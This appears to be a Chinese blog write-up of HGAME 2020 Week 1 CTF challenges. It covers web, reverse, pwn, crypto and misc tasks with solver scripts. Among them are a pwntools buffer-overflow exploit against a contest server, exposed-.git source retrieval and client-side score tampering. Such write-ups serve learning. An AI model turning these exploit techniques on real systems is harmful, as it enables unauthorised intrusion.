HGAME 2020 Week1 wp

新年快乐

还有,本人萌新,求大佬指正

Web

1. Cosmos 的博客


版本管理工具,应该是git,访问./.git/config发现成功了,从里面找到了远程仓库的地址。



访问,切换版本,解base64即可得flag。


2. 接 头 霸 王

按照一步一步的提示构造头即可,请求方式为POST,最终构造的头如下



3. Code World

GET请求发现302跳转,请求POST发现正常。根据提示POST的a为运算后值10,直接0+10发现错误,根据题目提示CodeWorld联想到URLEncode,POST内容改为0%2b10,提示错误,根据提示,访问./index.php?a=10%2b0,成功获取flag。


4. 🐔尼泰玫

游戏很好玩。
F12查看源码,发现js的_main方法。



通过Console获取_main对象的属性和方法,console.log(_main.start),发现Score对象。点击开始游戏,修改_main.score对象中的值,比如修改_main.score.score = 100000000,玩游戏,得到flag。


Reverse

1. maze

查看一下文件类型



使用IDA64打开,F5



发现迷宫,写小程序跑就可以了。
#include <cstdio>
#include <string>
using namespace std;
typedef unsigned char byte;
static const byte arr[] = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,
1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0,
1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1,
1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0,
1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1,
1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0,
0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 1, 1,
1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0,
1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0,
1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1,
0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1,
1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1,
1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1,
1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1,
1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0,
1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0,
1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1,
1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1,
0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1,
0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1,
1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0,
1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0,
1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1,
1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 1,
1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0,
0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 1,
1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1,
0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0,
1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0,
1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0,
1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 0, 1,
1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0,
0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0,
1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1,
0, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0,
1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1,
0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1,
0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1,
1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0,
1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1,
1, 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1,
1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1,
1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0,
0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0,
1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1,
1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0,
1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1,
1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1,
1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1,
0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1,
1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1,
1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0,
1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0,
1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1 };
const byte *start = arr + 32;
const byte *end = arr + 1052;
const byte *ex = arr + 988;
const byte *st = arr + 100;
int main() {
    const byte *cur = start;
    for (int i = 0; i < 16; ++i) {
        for (int j = 0; j < 16; ++j) {
            int now = *(int*)cur;
            if (cur == ex)
                printf("%s", "e");
            else if (cur == st)
                printf("%s", "s");
            else 
                printf("%s", (now & 1) ? "n" : "y");
            cur += 4;
        }
        printf("\n");
    }
    system("pause");
}

根据路线就能得到flag。

2. bitwise_operation2

步骤同上。

#include <cstdio>
#include <bitset>
using namespace std;
void int2hex(unsigned char *inte, char *buf) {
    for (int i = 0; i < 8; ++i) {
        sprintf(&buf[2*i], "%02x", inte[i]);
    }
}
int main() {
    unsigned char tarr1[] = { 'e', '4', 's', 'y', '_', 'R', 'e', '_' };
    unsigned char tarr2[] = { 'E', 'a', 's', 'y', 'l', 'i', 'f', '3' };
    char v6[] = { 76, 60, -42, 54, 80, -120, 32, -52 };
    unsigned char v7[8] = { 0 };
    unsigned char v9[8] = { 0 };
    for (int i = 0; i < 8; ++i) {
        v7[i] = v6[i] ^ tarr1[i];
    }
    for (int i = 0; i < 8; ++i) {
        v9[i] = tarr2[i] ^ v7[i];
    }
    /* *
     * 进行了这样的运算,有两个二进制int8,分别为v7 : abcdefgh和v9 : ABCDEFGH,进行运算完成后分别为
     *                                       v7 : aAcCeEgG和v9 : bBdDfFhH
     *                                       在此之前,v7还把前三位放到最后,把后五位移到前面
     * */
    for (int i = 0; i < 8; ++i) {
        bitset<8> v7t = v7[i];
        bitset<8> v9t = v9[7 - i];
        bitset<8> v7to = v7t;
        bitset<8> v9to = v9t;
        for (int j = 0; j < 8; j += 2) {
            v9to[j + 1] = v7t[j];
            v7to[j] = v9t[j + 1];
        }
        string v7str = v7to.to_string();
        v7to = bitset<8>(v7str.substr(5, 3) + v7str.substr(0, 5));
        v7[i] = v7to.to_ulong();
        v9[7 - i] = v9to.to_ulong();
    }
    char str1[17] = { 0 };
    char str2[17] = { 0 };
    int2hex(v7, str1);
    int2hex(v9, str2);
    printf("%s %s", str1, str2);
}

3. advance

步骤同上,在Strings界面找到字符串从而确定main函数位置,发现是替换base64TABLE的加密,根据base64原理写脚本如下。

#!/usr/bin/python2
# -*- coding: utf-8 -*-
def mask(t):
    b = bin(t)
    b = b[2:]
    if len(b) != 6:
        l = 6 - len(b)
        for _ in range(l):
            b = "0" + b
    return b
base = "abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ"
map = {}
for i in range(0, 64):
    map.setdefault(base[i], i)
map.setdefault("=", 0)
s = "0g371wvVy9qPztz7xQ+PxNuKxQv74B/5n/zwuPfX"
eqs = s.count("=")
s = s[:len(s) - eqs]
ans = "0b"
for c in s:
    ans += mask(map[c])
ans += "00" if eqs == 1 else "0000" if eqs == 2 else ""
print(hex(eval(ans))[2:-1].decode("hex"))

4. cpp

程序使用了string和vector类,核心部分代码描述如下:

flag = input()
assert flag.startswith("hgame{") and flag[61] == "}"
values = [int(i) for i in flag[6:61].split("_")]
arr1 = [26727, 24941, 101, 29285, 26995, 29551, 29551, 25953, 29561]
arr2 = [1, 0, 1, 0, 1, 1, 1, 2, 2]
for j in range(3):
    for k in range(3):
        tmp = 0
        for l in range(3):
            tmp += arr2[3 * l + k] * values[l + 3 * j]
        assert arr1[3 * j + k] == tmp
print(success)

可以发现是矩阵相乘,使用z3求解脚本如下:

#!/usr/bin/python3
# -*- coding: utf-8 -*-
from z3 import *
v16 = [Int('z%d' % (i+1)) for i in range(9)]
v25 = [26727, 24941, 101, 29285, 26995, 29551, 29551, 25953, 29561]
v24 = [1, 0, 1, 0, 1, 1, 1, 2, 2]
solver = Solver()
for j in range(3):
    for k in range(3):
        v14 = 0
        for l in range(3):
            v14 += v24[3 * l + k] * v16[l + 3 * j]
        solver.add(v25[3 * j + k] == v14)
print(solver.check())
assert solver.check() == sat
m = solver.model()
result = [m[i] for i in v16]
flag = "hgame{"
for i in result:
    flag += str(i) + '_'
flag = flag[:-1] + "}"
print(flag)

Pwn

1. Hard_AAAAA

查看文件信息



拖进IDA分析,前123位是"A",后面是给定的值就可以了。


from pwn import *
c = remote("47.103.214.163", 20000)
s = c.readline()
c.sendline(b"A"*123+b"0O0o\0O0")
c.interactive()

之后ls,cat flag

3. One_Shot

步骤同上




覆盖掉’\0‘就好了,因此首先输入32个"A",再输入6295776就可以了。

Crypto

1. InfantRSA

真签到

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from Crypto.Util.number import inverse
p = 681782737450022065655472455411
q = 675274897132088253519831953441
e = 13
c = 275698465082361070145173688411496311542172902608559859019841
d = inverse(e, (p-1)*(q-1))
m = pow(c, d, p*q)
print(hex(m)[2:-1].decode("hex"))

2. Affine

方程组,解一下就能出A,B

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from Crypto.Util.number import inverse
TABLE = 'zxcvbnmasdfghjklqwertyuiop1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
MOD = len(TABLE)
A = 13
B = 14
cipher = 'A8I5z{xr1A_J7ha_vG_TpH410}'
flag = ''
for c in cipher:
    ii = TABLE.find(c)
    if ii == -1:
        flag += c
    else:
        A_ = inverse(A, MOD)
        i = A_ * (ii - B) % MOD
        flag += TABLE[i]
print(flag)

3. not_One-time

只要数据足够多,我就能爆破出来。

#!/usr/bin/python3
# -*- coding: utf-8 -*-
import string
import base64
from socket import socket
TABLE = [ ord(x) for x in string.ascii_letters+string.digits]
PRINTABLE = [ord(x) for x in string.printable]
strlist = []
for _ in range(1024):
    sock = socket()
    sock.connect(("47.98.192.231", 25001))
    strlist.append(base64.b64decode(sock.recv(1024)))
    sock.close()
anslist = []
for i in range(0, 43):
    setlist = []
    for str in strlist:
        chset = set()
        for c in TABLE:
            assert c < 256
            assert str[i] < 256
            tmp = c^str[i]
            assert tmp < 256
            if tmp in PRINTABLE:
                chset.add(tmp)
        setlist.append(chset)
    ans = setlist[0]
    for chset in setlist:
        if len(chset) != 0:
            ans &= chset
    print(ans)
    anslist.append(ans)
for s in anslist:
    if len(s) == 1:
        print(chr(s.pop()), end = "")
    elif len(s) == 0:
        print("|", end = "")
    else:
        print("*", end = "")

4. Reorder

置换

#!/usr/bin/python3
# -*- coding: utf-8 -*-
from socket import socket
orderbox = []
origin = "abcdefghijklmnopqrstuvwxyzABCDEF".encode()
sock = socket()
sock.connect(("47.98.192.231", 25002))
sock.recv(1024)
sock.send(origin)
cipher = sock.recv(1024).split(b"\n")[0]
for c in cipher:
    orderbox.append(origin.find(c))
sock.send(b"\n")
sock.recv(1024)
rec = sock.recv(1024)
cipher = rec.split(b"\n")[1]
origin = [""]*32
for i in range(32):
    origin[orderbox[i]] = chr(cipher[i])
print("".join(origin))
sock.close()

MISC

1. 欢迎参加HGame!

先解base64,之后摩斯电码。

#!/usr/bin/python3
# -*- coding: utf-8 -*-
import base64
lookup = {'!': '-.-.--', "'": '.----.', '"': '.-..-.', '$': '...-..-', '&': '.-...', '(': '-.--.', ')': '-.--.-', '+': '.-.-.', ',': '--..--', '-': '-....-', '.': '.-.-.-', '/': '-..-.', '0': '-----', '1': '.----', '2': '..---', '3': '...--', '4': '....-', '5': '.....', '6': '-....', '7': '--...', '8': '---..', '9': '----.', ':': '---...', ';': '-.-.-.', '=': '-...-',
          '?': '..--..', '@': '.--.-.', 'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.', 'F': '..-.', 'G': '--.', 'H': '....', 'I': '..', 'J': '.---', 'K': '-.-', 'L': '.-..', 'M': '--', 'N': '-.', 'O': '---', 'P': '.--.', 'Q': '--.-', 'R': '.-.', 'S': '...', 'T': '-', 'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-', 'Y': '-.--', 'Z': '--..', '_': '..--.-', }
lookup = dict(zip(lookup.values(), lookup.keys()))
str = "Li0tIC4uLi0tIC4tLi4gLS4tLiAtLS0tLSAtLSAuIC4uLS0uLSAtIC0tLSAuLi0tLi0gLi4tLS0gLS0tLS0gLi4tLS0gLS0tLS0gLi4tLS4tIC4uLi4gLS0uIC4tIC0tIC4uLi0t"
str = base64.b64decode(str.encode()).decode()
strarr = str.split(" ")
for str in strarr:
    print(lookup[str], end="")

2. 壁纸

binwalk分析,foremost提取,找到壁纸的pixiv作者名字,去搜索就能搜到ID,之后就是常规操作。

4. 签到题ProPlus

好多次栅栏和凯撒实际可以等效为一次,按照字母频率可以找到凯撒的位移数目,之后就能解出来了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,172评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,346评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,788评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,299评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,409评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,467评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,476评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,262评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,699评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,994评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,167评论 1 343
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,827评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,499评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,149评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,387评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,028评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,055评论 2 352